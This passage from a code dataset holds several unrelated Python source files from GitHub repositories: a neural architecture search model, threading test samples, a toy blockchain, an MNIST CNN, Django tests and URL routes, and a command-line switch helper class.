i in range(self.step):\n\t\t\tbuff = []\n\t\t\tfor j in range(1+i):\n\t\t\t\top = self._ops[offset]\n\t\t\t\tbuff.append(op(states[j], w[offset]))\n\t\t\t\toffset += 1\n\t\t\tbuff = sum(buff)\n\t\t\tstates.append(buff)\n\t\tconcat_feat = torch.cat(states[-self.multiplier:], dim=1)\n\t\tout = self.conv_last(concat_feat)\n\t\treturn out \n\nclass Stage(M.Model):\n\tdef initialize(self, num_unit, chn, multiplier, step, reduce_size=None):\n\t\tself.units = nn.ModuleList()\n\t\tfor n in range(num_unit):\n\t\t\tself.units.append(CellBuilder(step, multiplier, chn))\n\t\tself.reduce_size = reduce_size\n\t\tif not reduce_size is None:\n\t\t\tself.reduce = FactReduce(reduce_size)\n\tdef forward(self, x, w):\n\t\tfor u in self.units:\n\t\t\tx = u(x, w)\n\t\tif not self.reduce_size is None:\n\t\t\tx = self.reduce(x)\n\t\treturn x \n\nclass Body(M.Model):\n\tdef initialize(self, unit_list, chn_list, multiplier, step):\n\t\tself.step = step \n\n\t\tself.c1 = M.ConvLayer(5, 64, stride=2, activation=M.PARAM_RELU, batch_norm=True, usebias=False)\n\t\tself.c2 = M.ConvLayer(3, 64, stride=1, activation=M.PARAM_RELU, batch_norm=True, usebias=False)\n\n\t\tself.stage1 = Stage(unit_list[0], chn_list[0], multiplier, step, reduce_size=chn_list[1])\n\t\tself.stage2 = Stage(unit_list[1], chn_list[1], multiplier, step, reduce_size=chn_list[2])\n\t\tself.stage3 = Stage(unit_list[2], chn_list[2], multiplier, step, reduce_size=chn_list[3])\n\t\tself.stage4 = Stage(unit_list[3], chn_list[3], multiplier, step, reduce_size=None)\n\n\tdef build(self, *inputs):\n\t\tk = sum(1 for i in range(self.step) for n in range(1+i))\n\t\tself.alphas_cell = Parameter(torch.Tensor(k, 8))\n\t\tinit.zeros_(self.alphas_cell)\n\n\tdef forward(self, x):\n\t\t# hardcode: there are 4 different scales \n\t\tx = self.c1(x)\n\t\tx = self.c2(x)\n\n\t\tw_cell = F.softmax(self.alphas_cell, dim=-1)\n\n\t\tx = self.stage1(x, w_cell)\n\t\tx = self.stage2(x, w_cell)\n\t\tx = self.stage3(x, w_cell)\n\t\tx = self.stage4(x, w_cell)\n\n\t\treturn x \n\nclass AutoFaceNet(M.Model):\n\tdef initialize(self):\n\t\tself.body = Body([2,2,10,2], [64,128,256,512], 3, 3)\n\t\tself.fc1 = M.Dense(512, usebias=False)\n\tdef forward(self, x):\n\t\tx = self.body(x)\n\t\tx = M.flatten(x)\n\t\tfeat = self.fc1(x)\n\t\treturn feat \n\nif __name__=='__main__':\n\timport numpy as np \n\tx = torch.from_numpy(np.float32(np.zeros([1, 3, 112, 112])))\n\t# t = M.ConvLayer(3, 5, dilation_rate=5)\n\t# y = t(x)\n\t# print(y.shape)\n\tbody = Body([2,2,10,2], [64,128,256,512], 3, 3)\n\n\ty = body(x)\n\tprint(y.shape)\n","repo_name":"ddddwee1/sul","sub_path":"SUL_torch/example/network_search/autonetv3.py","file_name":"autonetv3.py","file_ext":"py","file_size_in_byte":7176,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"34"} +{"seq_id":"38954407145","text":"from time import sleep, time\n\nfrom testfixtures.fixture_resources import ResourceCleanup\nfrom utils.multi_thread import MThread, Events, TiSBarrier, TiSLock\nfrom utils.tis_log import LOG\nfrom keywords import nova_helper, vm_helper\n\n\ndef func(func_num, num, extra_arg=None):\n i = 0\n while i < num:\n LOG.info(\"func_num = {}\\niteration = {}\\nextra_arg = {}\".format(func_num, i, extra_arg))\n sleep(1)\n i += 1\n\n LOG.info(\"{} done\".format(func_num))\n\n\ndef test_multi_thread():\n LOG.tc_step(\"Create MThreads\")\n thread_1 = MThread(func, 1, 10, extra_arg=\"Hello\")\n thread_2 = MThread(func, 2, 6, extra_arg=\"Second\")\n # runs after test steps complete\n thread_3 = MThread(func, 3, 20, extra_arg=\"run for a long time\")\n thread_4 = MThread(nova_helper.create_flavor, 'threading', 'auto', vcpus=2, ram=1024)\n\n LOG.tc_step(\"Starting threads\")\n thread_1.start_thread()\n thread_2.start_thread()\n thread_3.start_thread()\n thread_4.start_thread()\n LOG.tc_step(\"Finished starting threads\")\n\n LOG.tc_step(\"Waiting for threads to finish\")\n thread_1.wait_for_thread_end()\n thread_2.wait_for_thread_end()\n thread_4.wait_for_thread_end()\n LOG.tc_step(\"Threads have finished\")\n\n id_ = thread_4.get_output()[1]\n LOG.info(\"flav_id = {}\".format(id_))\n ResourceCleanup.add(resource_type='flavor', resource_id=id_)\n\n\ndef test_copies_of_threads():\n LOG.tc_step(\"Make multiple threads with same params\")\n threads = []\n for i in range(1, 5):\n threads.append(MThread(func, i, 10, extra_arg=\"number: {}\".format(i)))\n\n for thread in threads:\n thread.start_thread()\n\n for thread in threads:\n thread.wait_for_thread_end()\n\n\ndef test_timing():\n threads = []\n flav_id = nova_helper.create_flavor('thread_testing')[1]\n ResourceCleanup.add(resource_type='flavor', resource_id=flav_id)\n start_1 = time()\n for i in range(0, 6):\n thread = MThread(vm_helper.boot_vm, 'threading_vm', flavor=flav_id)\n thread.start_thread(240)\n threads.append(thread)\n\n for thread in threads:\n thread.wait_for_thread_end()\n for thread in threads:\n ResourceCleanup.add(resource_type='vm', resource_id=thread.get_output()[1])\n end_1 = time()\n\n start_2 = time()\n for i in range(0, 2):\n vm_id = vm_helper.boot_vm('loop_vm', flav_id)[1]\n ResourceCleanup.add(resource_type='vm', resource_id=vm_id)\n end_2 = time()\n\n LOG.info(\"Time results:\\n\"\n \"Multithreading: {}\\n\"\n \"Single loop: {}\".format(end_1 - start_1, end_2 - start_2))\n\n\ndef events_func(func_num, reps, event):\n for i in range(0, reps):\n if i > reps / 2:\n event.wait_for_event(30)\n LOG.info(\"Function #{}\".format(func_num))\n sleep(1)\n\n\ndef test_events():\n e = Events(\"functions should wait here\")\n LOG.tc_step(\"Create multiple threads\")\n thread_1 = MThread(events_func, 1, 10, e)\n thread_2 = MThread(events_func, 2, 15, e)\n\n thread_1.start_thread(60)\n thread_2.start_thread(60)\n sleep(20)\n\n LOG.tc_step(\"Setting event\")\n e.set()\n thread_1.wait_for_thread_end()\n thread_2.wait_for_thread_end()\n LOG.tc_step(\"Threads have finished\")\n\n e.clear()\n e.wait_for_event(20, fail_ok=True)\n\n\ndef barr_func(func_num, rep, barrier):\n barrier.wait(10)\n for i in range(0, rep):\n LOG.info(\"function #{}\".format(func_num))\n sleep(1)\n\n\ndef test_barriers():\n LOG.tc_step(\"Negative barrier example (not enough threads waiting)\")\n barrier = TiSBarrier(2, timeout=20)\n thread_1 = MThread(barr_func, 1, 4, barrier)\n thread_1.start_thread(timeout=30)\n thread_1.wait_for_thread_end(fail_ok=True)\n\n LOG.tc_step(\"Positive barrier example\")\n barrier = TiSBarrier(2, timeout=20)\n thread_1 = MThread(barr_func, 2, 4, barrier)\n thread_2 = MThread(barr_func, 3, 4, barrier)\n\n thread_1.start_thread(timeout=30)\n thread_2.start_thread(timeout=30)\n thread_1.wait_for_thread_end()\n thread_2.wait_for_thread_end()\n\n\ndef get_lock(lock, th_num):\n sleep(1)\n LOG.info(\"{} getting lock\".format(th_num))\n if lock.acquire():\n LOG.info(\"{} got lock\".format(th_num))\n sleep(5)\n LOG.info(\"{} release lock\".format(th_num))\n else:\n LOG.info(\"Didn't get lock\")\n lock.release()\n LOG.info(\"{} released lock\".format(th_num))\n\n\ndef get_lock_with(lock, th_num):\n sleep(1)\n LOG.info(\"{} getting lock\".format(th_num))\n with lock as got_lock:\n if got_lock:\n LOG.info(\"{} got lock\".format(th_num))\n sleep(5)\n LOG.info(\"{} release lock\".format(th_num))\n else:\n LOG.info(\"Didn't get lock\")\n LOG.info(\"{} released lock\".format(th_num))\n\n\ndef test_lock():\n LOG.tc_step(\"Positive lock example\")\n lock = TiSLock(True)\n thread_1 = MThread(get_lock, lock, 1)\n thread_2 = MThread(get_lock, lock, 2)\n thread_1.start_thread(30)\n sleep(1)\n thread_2.start_thread(30)\n thread_1.wait_for_thread_end(0)\n thread_2.wait_for_thread_end(30)\n\n LOG.tc_step(\"Negative lock example\")\n lock = TiSLock(True, 2)\n thread_1 = MThread(get_lock, lock, 1)\n thread_2 = MThread(get_lock, lock, 2)\n thread_1.start_thread(30)\n sleep(1)\n thread_2.start_thread(30)\n thread_1.wait_for_thread_end(0, fail_ok=True)\n thread_2.wait_for_thread_end(30, fail_ok=True)\n","repo_name":"pvaduva/auto_test","sub_path":"CGCSAuto/testcases/~samples/demo_test_multi_thread.py","file_name":"demo_test_multi_thread.py","file_ext":"py","file_size_in_byte":5391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11378681963","text":"from cryptography.hazmat.primitives import hashes\nimport uuid\nimport logging\nimport os\nfrom environs import Env\n\nenv = Env()\n# Read .env into os.environ\nenv.read_env()\n\nLOG_FILE = env(\"log_file\")\n\nlogging.basicConfig(\n filename=LOG_FILE,\n filemode=\"a+\",\n format=\"%(name)s - %(levelname)s - %(message)s\",\n level=logging.DEBUG,\n)\n\n\nclass data_block:\n def __init__(self, data_trxn: str):\n self.trxn = data_trxn\n\n def __str__(self):\n return str(self.__dict__)\n\n\nclass genesys_block:\n def __init__(self):\n self.data = data_block(data_trxn=\"GAN0\")\n\n\nclass meta_block:\n def __init__(self, data: data_block, prev_data: data_block):\n self.uuid = uuid.uuid1()\n self.hash = self._get_hash(data.__str__())\n self.link = self._get_hash(prev_data.__str__())\n\n def _get_hash(self, data: str):\n digest = hashes.Hash(hashes.SHA256())\n digest.update(data.encode(\"utf-8\"))\n return digest.finalize()\n\n\nclass block:\n def __init__(self, trxn: str, prev_block):\n self.data = data_block(data_trxn=trxn)\n self.meta = meta_block(data=self.data, prev_data=prev_block.data)\n\n\nif __name__ == \"__main__\":\n gb = genesys_block()\n # logging.debug(f\"Module : block :: Class : - :: Method : __main__ :: property : genesys_block :: value : {gb.data.__str__()}\")\n b0 = block(trxn=\"GAN1\", prev_block=gb)\n print(f\"ID : {b0.meta.uuid}\\nHash : {b0.meta.hash}\\nLink : {b0.meta.link}\\n\")\n b1 = block(trxn=\"GAN2\", prev_block=b0)\n print(f\"ID : {b1.meta.uuid}\\nHash : {b1.meta.hash}\\nLink : {b1.meta.link}\\n\")\n b2 = block(trxn=\"GAN3\", prev_block=b1)\n print(f\"ID : {b2.meta.uuid}\\nHash : {b2.meta.hash}\\nLink : {b2.meta.link}\\n\")\n","repo_name":"charudatta10/web3","sub_path":"src/block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1544988840","text":"# Plot a scan of the robot using matplotlib.\n#TOTAL SCAN = 660\n\nfrom pylab import *\nfrom lego_robot import *\nn=int(input(\"enter the scan number-..\"))\n# Read the logfile which contains all scans.\nlogfile = LegoLogfile()\nlogfile.read(\"robot4_scan.txt\")\n\n# Plot one scan.\nplot(logfile.scan_data[n])\nshow()\n","repo_name":"marsiitr/RoverSim","sub_path":"src/EKF SLAM/landmark extraction/plot_scan.py","file_name":"plot_scan.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"43679370618","text":"import os\nimport logging\nimport time\nimport tensorflow as tf\nimport numpy as np\nimport sys\nimport shutil\nfrom numpy import sqrt\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport matplotlib.pyplot as plt\nfrom utils import *\nfrom sklearn.metrics import confusion_matrix\n\nMODEL_NAME = os.path.basename(os.path.splitext(__file__)[0])\nlogger = get_logger(MODEL_NAME)\n\nSAVED_MODEL_PATH = \"{}/\".format(MODEL_NAME)\nnp.set_printoptions(threshold=np.nan)\ntf.set_random_seed(deterministic_seed)\ndata = input_data.read_data_sets('MNIST-data', one_hot=True)\n\ndata.test.cls = np.array([label.argmax() for label in data.test.labels])\ndata.train.cls = np.array([label.argmax() for label in data.train.labels])\n\n\"\"\" The actual model \"\"\"\nx = tf.placeholder(tf.float32, [None, img_size_flat], name=\"image\")\ny_true = tf.placeholder(tf.float32, [None, num_classes], name=\"y_true\")\ny_true_cls = tf.argmax(y_true, axis=1)\n\n# First convolutional layer\nx_image = tf.reshape(x, [-1, 28, 28, 1])\n\nweights1 = get_weights([5, 5, 1, 32])\nbiases1 = get_bias([32])\nh_conv1 = tf.nn.relu(tf.nn.conv2d(x_image, weights1, strides=[1, 1, 1, 1], padding='SAME') + biases1)\nh_pool1 = tf.nn.max_pool(h_conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\n# Second convolutional layer\nweights2 = get_weights([5, 5, 32, 64])\nbiases2 = get_bias([64])\n\nh_conv2 = tf.nn.relu(tf.nn.conv2d(h_pool1, weights2, strides=[1, 1, 1, 1], padding='SAME') + biases2)\nh_pool2 = tf.nn.max_pool(h_conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\n# First fully connected:\nweights_fully_connected1 = get_weights([7 * 7 * 64, 1024])\nbiases_fully_connected1 = get_bias([1024])\n\nh_pool2_flat = tf.reshape(h_pool2, [-1, 7 * 7 * 64])\nh_fully_connected1 = tf.nn.relu(tf.matmul(h_pool2_flat, weights_fully_connected1) + biases_fully_connected1)\n\n# Second fully connected\nweights_fully_connected2 = get_weights([1024, num_classes])\nbiases_fully_connected2 = get_bias([num_classes])\n\nh_fully_connected2 = tf.matmul(h_fully_connected1, weights_fully_connected2) + biases_fully_connected2\n\n# Softmax!\ny_pred = tf.nn.softmax(h_fully_connected2)\ny_pred_cls = tf.argmax(y_pred, axis=1)\n\ncross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=h_fully_connected2, labels=y_true)\ncost = tf.reduce_mean(cross_entropy)\n\noptimizer = tf.train.AdamOptimizer(learning_rate=1e-4).minimize(cost)\n\ncorrect_prediction = tf.equal(y_pred_cls, y_true_cls)\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsaver = tf.train.Saver()\n\ncurrent_batch = 0\nnumber_of_iterations = 10000\nwith tf.Session(config=config) as sess:\n sess.run(tf.global_variables_initializer())\n if len(sys.argv) != 2:\n raise ValueError(\"Wrong number of parameters\")\n\n if sys.argv[1] == \"train\":\n shutil.rmtree(SAVED_MODEL_PATH, ignore_errors=True)\n for i in range(number_of_iterations):\n current_batch += 50\n current_batch %= 55000\n batch_images = data.train.images[current_batch:current_batch + 50]\n batch_true = data.train.labels[current_batch:current_batch + 50]\n if i % 100 == 0:\n train_accuracy = accuracy.eval(feed_dict={x: batch_images, y_true: batch_true})\n print(\"step %d, training accuracy: %.4f\" % (i, train_accuracy))\n if i % 1000 == 0:\n saver.save(sess=sess, save_path=SAVED_MODEL_PATH)\n optimizer.run(feed_dict={x: batch_images, y_true: batch_true})\n saver.save(sess=sess, save_path=SAVED_MODEL_PATH)\n\n elif sys.argv[1] == \"extract_layers\":\n saver.restore(sess=sess, save_path=SAVED_MODEL_PATH)\n\n flatten_h_pool1 = tf.reshape(h_pool1, shape=[-1, 14 * 14 * 32])\n flatten_h_pool2 = tf.reshape(h_pool2, shape=[-1, 7 * 7 * 64])\n h_fully_connected1 = tf.reshape(h_fully_connected1, shape=[-1, 1024])\n h_fully_connected2 = tf.reshape(h_fully_connected2, shape=[-1, 10])\n batch_size = 200\n layer_file_names = [\"vanilla_layer_1.txt\", \"vanilla_layer_2.txt\", \"vanilla_layer_3.txt\", \"vanilla_layer_4.txt\"]\n file_handles = [open(layer_filename, \"a\") for layer_filename in layer_file_names]\n for i in range(len(data.train.images) // batch_size):\n dict_to_feed = {x: data.train.images[batch_size * i: batch_size * i + batch_size],\n y_true: data.train.labels[batch_size * i: batch_size * i + batch_size]}\n\n np.savetxt(file_handles[0], flatten_h_pool1.eval(feed_dict=dict_to_feed), fmt=\"%f\")\n np.savetxt(file_handles[1], flatten_h_pool2.eval(feed_dict=dict_to_feed), fmt=\"%f\")\n np.savetxt(file_handles[2], h_fully_connected1.eval(feed_dict=dict_to_feed), fmt=\"%f\")\n np.savetxt(file_handles[3], h_fully_connected2.eval(feed_dict=dict_to_feed), fmt=\"%f\")\n if i % 10 == 0:\n print(\"Current iteration: {}\".format(i))\n [file.close() for file in file_handles]\n elif sys.argv[1] == \"restore\":\n saver.restore(sess=sess, save_path=SAVED_MODEL_PATH)\n\n all_points = np.zeros(len(data.test.images))\n batch = 100\n for j in range(len(all_points) // batch):\n tmp = np.array(data.test.labels[batch * j:batch * j + batch])\n all_points[batch * j: batch * j + batch] = y_pred_cls.eval(\n feed_dict={x: np.array(data.test.images[batch * j:batch * j + batch]),\n y_true: tmp})\n cm = confusion_matrix(y_true=data.test.cls, y_pred=all_points)\n\n all_precisions = []\n all_recalls = []\n for i in range(num_classes):\n precision = get_precision(i, cm)\n recall = get_recall(i, cm)\n all_precisions.append(precision)\n all_recalls.append(recall)\n print(\"Precision for {}: %.3f\".format(i) % precision)\n print(\"Recall for {}: %.3f\".format(i) % recall)\n print(\"Model accuracy: {}\".format(get_model_accuracy(all_points, data.test.cls)))\n correct = all_points == data.test.cls\n plot_confusion_matrix_nicely(cm)\n else:\n raise ValueError(\"Bad parameter given.\")\n\n","repo_name":"RedPenguin100/ml_project","sub_path":"basic/vanilla_model.py","file_name":"vanilla_model.py","file_ext":"py","file_size_in_byte":6194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"41623349826","text":"import json\nfrom django.test import TestCase\n\nfrom lists.models import List, Item\n\n\nclass ListAPITest(TestCase):\n \"\"\"Тест API списков\"\"\"\n base_url = '/api/lists/{}/'\n\n def get_list_url(self, list_):\n return self.base_url.format(list_.id)\n\n def test_get_returns_json_200(self):\n \"\"\"\n Тест: возвращает json и код состояния 200\n \"\"\"\n list_ = List.objects.create()\n response = self.client.get(self.get_list_url(list_))\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response['content-type'], 'application/json')\n\n def test_get_returns_items_correct_list(self):\n \"\"\"\n Тест: получает отклик с элементами правильного списка\n \"\"\"\n other_list = List.objects.create()\n Item.objects.create(list=other_list, text='item 1')\n correct_list = List.objects.create()\n item1 = Item.objects.create(list=correct_list, text='item 1')\n item2 = Item.objects.create(list=correct_list, text='item 2')\n response = self.client.get(self.get_list_url(correct_list))\n self.assertEqual(\n json.loads(response.content.decode('utf8')),\n [\n {'id': item1.id, 'text': item1.text},\n {'id': item2.id, 'text': item2.text}\n ]\n )\n\n def test_POSTing_a_new_item(self):\n \"\"\"\n Тест: отправляя POST-запрос, можно создать элемент списка\n \"\"\"\n list_ = List.objects.create()\n response = self.client.post(\n self.get_list_url(list_),\n {'text': 'new item'},\n )\n self.assertEqual(response.status_code, 201)\n new_item = list_.item_set.get()\n self.assertEqual(new_item.text, 'new item')\n","repo_name":"Trofmann/superlists","sub_path":"lists/tests/test_api/test_list.py","file_name":"test_list.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36762073366","text":"import _rightThumb._matrix as _matrix\n\n# ## {R2D2919B742E} ##\n# ###########################################################################\n# What if magic existed?\n# What if a place existed where your every thought and dream come to life.\n# There is only one catch: it has to be written down.\n# Such a place exists, it is called programming.\n# - Scott Taylor Reph, RightThumb.com\n# ###########################################################################\n# ## {C3P0D40fAe8B} ##\n\nimport _rightThumb._base3 as _\nimport time\n\nthisChildApp = _matrix.GenChildLabel.gen( __file__ )\n\nclass TheChild:\n\tdef __init__( self, theID, registration ):\n\t\tself.id = theID\n\t\tself.ids = []\n\t\tself.triggerDefault = None\n\t\tself.registration = registration\n\t\tself.switchDelim = _matrix.switchDelim\n\t\tself.switchDelimReplace = _matrix.switchDelimReplace\n\t\t_matrix.app.sequences['switch']['algorithm'] = {}\n\t\tself.key = None\n\t\tself.add( theID, registration )\n\n\tdef callers( self, trackingID=None ):_.printVar( _matrix.app.algorithmRegister(trackingID=trackingID) );\n\n\n\tdef add( self, theID, registration ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=registration['trackingID'])\n\t\tself.ids.append( theID )\n\t\tself.focus = registration['focus']\n\t\tself.name = registration['name']\n\t\tself.hashID = registration['hashID']\n\n\t\tself.required = False\n\t\tself.pipe = False\n\t\tself.documentation = {}\n\t\t\n\t\tself.isDefault = registration['isDefault']\n\t\tif 'isRequired' in registration.keys():\n\t\t\tself.required = registration['isRequired']\n\t\t\n\t\tif 'isPipe' in registration.keys():\n\t\t\tself.required = registration['isPipe']\n\n\t\tif 'example' in registration.keys():\n\t\t\tself.example = registration['example']\n\t\telse:\n\t\t\tself.example = None\n\n\n\t\tif 'expected_input_example' in registration.keys():\n\t\t\tself.expected_input_example = registration['expected_input_example']\n\t\telse:\n\t\t\tself.expected_input_example = None\n\n\n\t\tif 'examples' in registration.keys():\n\t\t\tself.documentation['examples'] = registration['examples']\n\n\t\tif 'required' in registration.keys():\n\t\t\tself.documentation['required'] = registration['required']\n\n\t\tif 'related' in registration.keys():\n\t\t\tself.documentation['related'] = registration['related']\n\n\t\tif 'description' in registration.keys():\n\t\t\tself.documentation['description'] = registration['description']\n\t\telse:\n\t\t\tself.documentation = None\n\n\t\tself.name = None\n\t\tself.switches = None\n\n\t\tif 'name' in registration.keys():\n\t\t\tself.name = registration['name']\n\t\tif 'n' in registration.keys():\n\t\t\tself.name = registration['n']\n\n\t\tif 'switches' in registration.keys():\n\t\t\tself.switches = registration['switches']\n\t\tif 's' in registration.keys():\n\t\t\tself.switches = registration['s']\n\n\t\tself.appReg = registration['focus']\n\n\n\t\tself.id = theID\n\t\tself.pos = 0\n\t\tself.active = False\n\t\tself.value = ''\n\t\tself.values = []\n\t\tself.script = None\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\t\t\n\tdef hasVal( self, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\t\n\t\tif len(self.value):\n\t\t\treturn _matrix.app.algorithmResult( algorithm, result=True )\n\t\telse:\n\t\t\treturn _matrix.app.algorithmResult( algorithm, result=False )\n\tdef hv( self, trackingID=None ):\n\t\treturn self.hasVal( trackingID=trackingID )\n\n\tdef l( self, trackingID=None ):\n\t\treturn self.hasVal( trackingID=trackingID )\n\n\n\tdef inV( self, search, trackingID=None ):\n\t\treturn self.inVal( search, trackingID=trackingID )\n\tdef inVal( self, search, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID, note=search)\n\t\t\n\t\tresult = False\n\t\tfor val in self.values:\n\t\t\tif search in val:\n\t\t\t\tresult = True\n\t\treturn _matrix.app.algorithmResult( algorithm, result=result )\n\n\tdef isV( self, search, trackingID=None ):\n\t\treturn self.isVal( search, trackingID=trackingID )\n\tdef isVal( self, search, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID,note=search)\n\t\t\n\t\tresult = False\n\t\tfor val in self.values:\n\t\t\tif search.lower() == val.lower():\n\t\t\t\tresult = True\n\n\t\treturn _matrix.app.algorithmResult( algorithm, result=result )\n\tdef about( self, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\tresult = {\n\t\t\t\t\t'active': self.active,\n\t\t\t\t\t'values': self.values,\n\t\t\t\t\t'value': self.value,\n\t\t} \n\t\treturn _matrix.app.algorithmResult( algorithm, result=result )\n\n\n\tdef isActive( self, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\treturn _matrix.app.algorithmResult( algorithm, result=self.active )\n\n\tdef ia( self, trackingID=None ):\n\t\treturn self.isActive( trackingID=trackingID )\n\n\tdef a( self, trackingID=None ):\n\t\treturn self.isActive( trackingID=trackingID )\n\n\n\n\tdef setActive( self, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\tself.active = True\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\n\tdef setNotActive( self, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\tself.active = False\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\n\n\n\tdef v( self, data=None, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\t\n\t\tif not data is None:\n\t\t\tself.value = self.format(data)\n\t\t\tself.values = [self.value]\n\t\t\n\n\n\tdef vs( self, data=None, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\n\n\t\tif not data is None:\n\t\t\tfor i,d in enumerate(data):\n\t\t\t\tdata[i] = self.format(d)\n\t\t\tself.values = data\n\t\t\tfor i,v in data:\n\t\t\t\tdata[i] = data[i].replace( self.switchDelim, self.switchDelimReplace )\n\t\t\tself.value = self.switchDelim.join( data )\n\t\t\n\n\n\tdef getValue( self, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\treturn _matrix.app.algorithmResult( algorithm, result=self.value )\n\n\tdef getValues( self, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\treturn _matrix.app.algorithmResult( algorithm, result=self.values )\n\n\n\tdef setValue( self, data, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\tself.value = self.format(data)\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\n\tdef setValues( self, data, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\n\t\tfor i,d in enumerate(data):\n\t\t\tdata[i] = self.format(d)\n\t\tself.values = data\n\t\tfor i,v in data:\n\t\t\tdata[i] = data[i].replace( self.switchDelim, self.switchDelimReplace )\n\t\tself.value = self.switchDelim.join( data )\n\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\n\tdef trigger( self, script, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\tself.script = script\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\n\tdef format( self, data, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\t\n\t\tif self.script is None:\n\t\t\treturn _matrix.app.algorithmResult( algorithm, result=data )\n\t\telse:\n\t\t\tresult = self.script( data )\n\t\t\treturn _matrix.app.algorithmResult( algorithm, result=result )\n\n\tdef triggerColumns( self ):\n\t\talgorithm = _matrix.app.algorithmRegister()\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\t\tself.triggerDefault = 'Columns'\n\t\tpass\n\n\tdef triggerColumnsSort( self ):\n\t\talgorithm = _matrix.app.algorithmRegister()\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\t\tself.triggerDefault = 'ColumnsSort'\n\t\tpass\n\n\tdef triggerAgo( self ):\n\t\talgorithm = _matrix.app.algorithmRegister()\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\t\tself.triggerDefault = 'triggerAgo'\n\t\tpass\n\n\tdef dump( self, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\tfor i, key in enumerate(_matrix.app.records['switch']):\n\t\t\trecord = _matrix.app.records['switch'][key]\n\t\t\t_.pr( record.focus, record.name, record.active )\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\n\n\tdef audit( self, ):\n\t\treturn _matrix.app.callers()\n\n\n# p file + _child --c | p line --c -make \" n {} \"\n\n\n\t\t\n\n\n\n","repo_name":"rightthumb/rightthumb-widgets-v0","sub_path":"widgets/python/_rightThumb/_matrix/_switch_child.py","file_name":"_switch_child.py","file_ext":"py","file_size_in_byte":8119,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"73278686498","text":"from django.urls import path, include\nfrom . import views\nfrom django.contrib.auth.decorators import login_required\n\napp_name = 'recipes'\n\nurlpatterns = [\n # Recipe CRUD\n path('', login_required(views.RecipeListView.as_view()), name='recipe-list'),\n path('create/', login_required(views.RecipeCreateView.as_view()), name='recipe-create'),\n path('/', login_required(views.RecipeDetailView.as_view( )), name='recipe-detail'),\n path('/update/', login_required(views.RecipeUpdateView.as_view()), name='recipe-update'),\n path('/delete/', login_required(views.RecipeDeleteView.as_view()), name='recipe-delete'),\n \n # WarehouseIngredient CRUD\n path('/wh-ingredient/create/', login_required(views.WarehouseIngredientCreateView.as_view()), name='wh-ingredient-create'),\n path('/wh-ingredient//', login_required(views.WarehouseIngredientDetailView.as_view()), name='wh-ingredient-detail'),\n path('/wh-ingredient//delete/', login_required(views.WarehouseIngredientDeleteView.as_view()), name='wh-ingredient-delete'),\n path('/wh-ingredient//update/', login_required(views.WarehouseIngredientUpdateView.as_view()), name='wh-ingredient-update'),\n path('/wh-ingredient/', login_required(views.WarehouseIngredientListView.as_view()), name='wh-ingredient-list'),\n\n # NonWarehouseIngredient CRUD\n path('/non-wh-ingredient/create', login_required(views.NonWarehouseIngredientCreateView.as_view()), name='non-wh-ingredient-create'),\n path('/non-wh-ingredient//', login_required(views.NonWarehouseIngredientDetailView.as_view()), name='non-wh-ingedient-detail'),\n path('/non-wh-ingredient//update/', login_required(views.NonWarehouseIngredientUpdateView.as_view()), name='non-wh-ingredient-update'),\n path('/non-wh-ingredient//delete/', login_required(views.NonWarehouseIngredientDeleteView.as_view()), name='non-wh-ingredient-delete'),\n 